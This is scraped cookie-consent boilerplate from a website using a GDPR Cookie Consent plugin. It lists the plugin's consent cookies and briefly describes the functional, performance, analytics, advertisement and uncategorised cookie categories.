cookielawinfo-checkbox-others11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance11 monthsThis cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy11 monthsThe cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.
Functional
Functional cookies help to perform certain functionalities like sharing the content of the website on social media platforms, collect feedbacks, and other third-party features.
Performance
Performance cookies are used to understand and analyze the key performance indexes of the website which helps in delivering a better user experience for the visitors.
Analytics
Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics the number of visitors, bounce rate, traffic source, etc.
Advertisement
Advertisement cookies are used to provide visitors with relevant ads and marketing campaigns. These cookies track visitors across websites and collect information to provide customized ads.
Others
Other uncategorized cookies are those that are being analyzed and have not been classified into a category as yet.
SAVE & ACCEPT